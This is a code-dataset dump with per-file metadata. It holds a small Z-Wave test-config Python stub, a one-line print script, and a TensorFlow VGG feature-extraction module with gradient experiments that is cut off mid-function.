| 30.156134
| 107
| 0.425419
| 1,211
| 8,112
| 2.76796
| 0.099917
| 0.073091
| 0.062649
| 0.023866
| 0.856205
| 0.855012
| 0.844869
| 0.844869
| 0.844869
| 0.844869
| 0
| 0.100173
| 0.357618
| 8,112
| 269
| 108
| 30.156134
| 0.543082
| 0.302268
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027586
| false
| 0
| 0.02069
| 0
| 0.075862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
548ad8d1602e22cc0e7021f926b86a1f2ed09a21
| 199
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_RU_validation_testing.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_RU_validation_testing.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pylib_multi_phy_model/protocol_reference_files/parts/nixi/z_wave_RU_validation_testing.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from ..nerio.z_wave_RU_validation_testing import z_wave_RU_validation_testing as z_wave_RU_validation_testing_nerio
class z_wave_RU_validation_testing(z_wave_RU_validation_testing_nerio):
pass
| 33.166667
| 115
| 0.894472
| 33
| 199
| 4.727273
| 0.333333
| 0.160256
| 0.224359
| 0.544872
| 0.833333
| 0.371795
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075377
| 199
| 5
| 116
| 39.8
| 0.847826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
54a017f3920cf3cbd410463750a17c09b3e238fa
| 15
|
py
|
Python
|
code/sample_2-1-12.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | 1
|
2022-03-29T13:50:12.000Z
|
2022-03-29T13:50:12.000Z
|
code/sample_2-1-12.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
code/sample_2-1-12.py
|
KoyanagiHitoshi/AtCoder-Python-Introduction
|
6d014e333a873f545b4d32d438e57cf428b10b96
|
[
"MIT"
] | null | null | null |
print(10**9+7)
| 7.5
| 14
| 0.6
| 4
| 15
| 2.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0.066667
| 15
| 1
| 15
| 15
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
54c58fff4207eabc7238b8cfa5cd0ae1acd75357
| 99,923
|
py
|
Python
|
tools/model_vgg.py
|
abenbihi/elf
|
fb63b7ca316a4da93e75421abbb05663d1c5fe7e
|
[
"BSD-2-Clause"
] | 25
|
2019-08-30T06:39:47.000Z
|
2021-11-22T12:32:32.000Z
|
tools/model_vgg.py
|
abenbihi/elf
|
fb63b7ca316a4da93e75421abbb05663d1c5fe7e
|
[
"BSD-2-Clause"
] | 10
|
2019-12-13T02:16:18.000Z
|
2022-02-09T23:31:05.000Z
|
tools/model_vgg.py
|
abenbihi/elf
|
fb63b7ca316a4da93e75421abbb05663d1c5fe7e
|
[
"BSD-2-Clause"
] | 6
|
2019-08-15T16:02:17.000Z
|
2021-11-24T11:57:10.000Z
|
"""
- netmork model
- loss
- optimizer
- summary
"""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import re
import sys
import tarfile
from six.moves import urllib
import tensorflow as tf
from math import sqrt
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import array_ops
FLAGS = tf.app.flags.FLAGS
@ops.RegisterGradient("MaxPoolGradWithArgmax")
def _MaxPoolGradGradWithArgmax(op, grad):
print(len(op.outputs))
print(len(op.inputs))
print(op.name)
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]),
dtype=op.inputs[0].dtype), array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops._max_pool_grad_grad_with_argmax(
op.inputs[0],
grad,
op.inputs[2],
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding")))
def model(images, is_training, reuse=False):
""" Network model
Args:
images: Images returned from distorted_inputs() or inputs().
Returns:
Logits.
"""
print('inference::input', images.get_shape())
bn = False
relu = False
feat, grads_dict = {},{}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv1_1 = tf.nn.relu(conv1_1)
print('conv1_1', conv1_1.get_shape())
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#feat['pool1'] = pool1
print('pool1', pool1.get_shape())
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv2_1 = tf.nn.relu(conv2_1)
print('conv2_1', conv2_1.get_shape())
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#feat['pool2'] = pool2
print('pool2', pool2.get_shape())
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv3_1 = tf.nn.relu(conv3_1)
print('conv3_1', conv3_1.get_shape())
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv3_2 = tf.nn.relu(conv3_2)
print('conv3_2', conv3_2.get_shape())
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
if relu:
conv3_3 = tf.nn.relu(conv3_3)
pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
#pool3 = tf.nn.l2_normalize(pool3, dim=3, epsilon=1e-12)
feat['pool3'] = pool3
print('pool3', pool3.get_shape())
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv4_1 = tf.nn.relu(conv4_1)
print('conv4_1', conv4_1.get_shape())
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv4_2 = tf.nn.relu(conv4_2)
print('conv4_2', conv4_2.get_shape())
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
if relu:
conv4_3 = tf.nn.relu(conv4_3)
#conv4_3 = tf.nn.l2_normalize(conv4_3, dim=3, epsilon=1e-12)
#feat['conv4_3'] = conv4_3
pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
#pool4 = tf.nn.l2_normalize(pool4, dim=3, epsilon=1e-12)
#feat['pool4'] = pool4
print('pool4', pool4.get_shape())
with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv5_1 = tf.nn.relu(conv5_1)
print('conv5_1', conv5_1.get_shape())
with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv5_2 = tf.nn.relu(conv5_2)
print('conv5_2', conv5_2.get_shape())
with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
if relu:
conv5_3 = tf.nn.relu(conv5_3)
pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
#pool5 = tf.nn.l2_normalize(pool5, dim=3, epsilon=1e-12)
print('pool5', pool5.get_shape())
# yayayaya
#feat['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#feat['pool2'] = tf.gradients(pool2, conv2_2, pool2)
#feat['pool3'] = tf.gradients(pool3, conv3_3, pool3)
#feat['pool4'] = tf.gradients(pool4, conv4_3, pool4)
#feat['pool5'] = tf.gradients(pool5, conv5_3, pool5)
# grad prop from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, grads_dict['pool5'])
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
feat['conv1_1'] = conv1_1
feat['conv1_2'] = conv1_2
feat['pool1'] = pool1
feat['conv2_1'] = conv2_1
feat['conv2_2'] = conv2_2
feat['pool2'] = pool2
feat['conv3_1'] = conv3_1
feat['conv3_2'] = conv3_2
feat['conv3_3'] = conv3_3
feat['pool3'] = pool3
feat['conv4_1'] = conv4_1
feat['conv4_2'] = conv4_2
feat['conv4_3'] = conv4_3
feat['pool4'] = pool4
feat['conv5_1'] = conv5_1
feat['conv5_2'] = conv5_2
feat['conv5_3'] = conv5_3
feat['pool5'] = pool5
return feat, grads_dict
def model_grad(images, is_training=False, reuse=False):
""" Network model
Args:
images: [batch)size, H, W, C]
is_training: True if traning mode (for batchnorm)
"""
if not reuse:
print('inference::input', images.get_shape())
bn = False
relu = True
grads_dict = {}
argmax = {}
feat = {}
with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv1_1 = tf.nn.relu(conv1_1)
if not reuse:
print('conv1_1', conv1_1.get_shape())
##grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv1_2 = tf.nn.relu(conv1_2)
pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
#pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
if not reuse:
print('pool1', pool1.get_shape())
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#feat['pool1'] = pool1
with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv2_1 = tf.nn.relu(conv2_1)
if not reuse:
print('conv2_1', conv2_1.get_shape())
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv2_2 = tf.nn.relu(conv2_2)
pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
#pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
if not reuse:
print('pool2', pool2.get_shape())
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv3_1 = tf.nn.relu(conv3_1)
if not reuse:
print('conv3_1', conv3_1.get_shape())
#grads_dict['conv3_1'] = tf.gradients(conv3_1, images, conv3_1)
with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv3_2 = tf.nn.relu(conv3_2)
if not reuse:
print('conv3_2', conv3_2.get_shape())
#grads_dict['conv3_2'] = tf.gradients(conv3_2, images, conv3_2)
with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
if relu:
conv3_3 = tf.nn.relu(conv3_3)
pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
#pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
if not reuse:
print('pool3', pool3.get_shape())
#grads_dict['conv3_3'] = tf.gradients(conv3_3, images, conv3_3)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv4_1 = tf.nn.relu(conv4_1)
if not reuse:
print('conv4_1', conv4_1.get_shape())
#grads_dict['conv4_1'] = tf.gradients(conv4_1, images, conv4_1)
with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv4_2 = tf.nn.relu(conv4_2)
if not reuse:
print('conv4_2', conv4_2.get_shape())
#grads_dict['conv4_2'] = tf.gradients(conv4_2, images, conv4_2)
with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
if relu:
conv4_3 = tf.nn.relu(conv4_3)
pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
#pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
if not reuse:
print('pool4', pool4.get_shape())
#grads_dict['conv4_3'] = tf.gradients(conv4_3, images, conv4_3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
if relu:
conv5_1 = tf.nn.relu(conv5_1)
if not reuse:
print('conv5_1', conv5_1.get_shape())
#grads_dict['conv5_1'] = tf.gradients(conv5_1, images, conv5_1)
with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
if relu:
conv5_2 = tf.nn.relu(conv5_2)
if not reuse:
print('conv5_2', conv5_2.get_shape())
#grads_dict['conv5_2'] = tf.gradients(conv5_2, images, conv5_2)
with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
if bn:
conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
if relu:
conv5_3 = tf.nn.relu(conv5_3)
pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
#pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
if not reuse:
print('pool5', pool5.get_shape())
#grads_dict['conv5_3'] = tf.gradients(conv5_3, images, conv5_3)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
# trials/0
#grads_dict['pool1'] = tf.gradients(pool1, images)
#grads_dict['pool2'] = tf.gradients(pool2, images)
#grads_dict['pool3'] = tf.gradients(pool3, images)
#grads_dict['pool4'] = tf.gradients(pool4, images)
#grads_dict['pool5'] = tf.gradients(pool5, images)
SOBEL = (0==1)
if SOBEL:
#NEW_C = 64 # pool1
NEW_C = 128 # pool2
#NEW_C = 512 # pool25
sobel_x = tf.tile(sobel_x, (1,1,1,NEW_C))
sobel_y = tf.tile(sobel_y, (1,1,1,NEW_C))
#grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['pool1_sobel_x'] = tf.gradients(pool1, images, sobel_x)
#grads_dict['pool1_sobel_y'] = tf.gradients(pool1, images, sobel_y)
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
if SOBEL:
grads_dict['pool2_sobel_x'] = tf.gradients(pool2, images, sobel_x)
grads_dict['pool2_sobel_y'] = tf.gradients(pool2, images, sobel_y)
pool2 = tf.nn.l2_normalize(pool2, dim=3, epsilon=1e-12)
sobel_x = tf.nn.l2_normalize(sobel_x, dim=3, epsilon=1e-12)
sobel_y = tf.nn.l2_normalize(sobel_y, dim=3, epsilon=1e-12)
grads_dict['pool2_min_sobel_x'] = tf.gradients(pool2, images, (pool2-sobel_x))
grads_dict['pool2_min_sobel_y'] = tf.gradients(pool2, images, (pool2-sobel_y))
# grad
#grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
#grads_dict['pool5_sobel_x'] = tf.gradients(pool5, images, sobel_x)
#grads_dict['pool5_sobel_y'] = tf.gradients(pool5, images, sobel_y)
#grads_dict['pool5_min_sobel_x'] = tf.gradients(pool5, images, (pool5-sobel_x))
#grads_dict['pool5_min_sobel_y'] = tf.gradients(pool5, images, (pool5-sobel_y))
# trials/1
#grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
#print(grads_dict['conv1_1'][0].get_shape())
#grads_dict['2_conv1_1'] = tf.gradients(
# #grads_dict['conv1_1'], images, images)
# grads_dict['conv1_1'], images,grads_dict['conv1_1'])
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['2_conv1_2'] = tf.gradients(
# grads_dict['conv1_2'], images,grads_dict['conv1_2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
#grads_dict['2_pool1'] = tf.gradients(
# grads_dict['pool1'], images, grads_dict['pool1'])
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
#
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_2)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_3)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_3)
# trials/1
# yayayaya
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_2, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_2, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_3, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_3, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_3, pool5)
# grad prop from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, grads_dict['pool5'])
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
# fail if you prop it not from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, pool4)
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_1, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_1, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_2, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_2, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_2, pool5)
#grads_dict['pool1_conv'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, pool1, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, pool2, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, pool3, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, pool4, pool5)
# trials/2
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#grads_dict['pool2'] = tf.gradients(pool2, conv1_2, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, conv1_2, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, conv1_2, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, conv1_2, pool5)
# trials/3
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2)
#grads_dict['pool2'] = tf.gradients(pool2, conv1_2)
#grads_dict['pool3'] = tf.gradients(pool3, conv1_2)
#grads_dict['pool4'] = tf.gradients(pool4, conv1_2)
#grads_dict['pool5'] = tf.gradients(pool5, conv1_2)
#pool4 = tf.nn.l2_normalize(pool4, dim=3, epsilon=1e-12)
feat['pool1'] = pool1
feat['pool2'] = pool2
feat['pool3'] = pool3
#feat['pool3'] = tf.nn.l2_normalize(feat['pool3'], dim=3, epsilon=1e-12)
#feat['conv3_3'] = conv3_3
feat['pool4'] = pool4
#feat['pool4'] = tf.nn.l2_normalize(feat['pool4'], dim=3, epsilon=1e-12)
feat['pool5'] = pool5
# grad as feature trial 1
#feat['pool5'] = tf.gradients(pool5, pool4, pool5)
#feat['pool4'] = tf.gradients(pool4, pool3, pool4)
#feat['pool4'] = tf.nn.l2_normalize(feat['pool4'], dim=3, epsilon=1e-12)
#feat['pool3'] = tf.gradients(pool5, pool3, pool5)
#feat['pool3'] = tf.gradients(pool3, pool2, pool3)
return feat, grads_dict
def small_model_grad(images, sobel_x, sobel_y, is_training=False, reuse=False):
""" Network model
Args:
images: [batch)size, H, W, C]
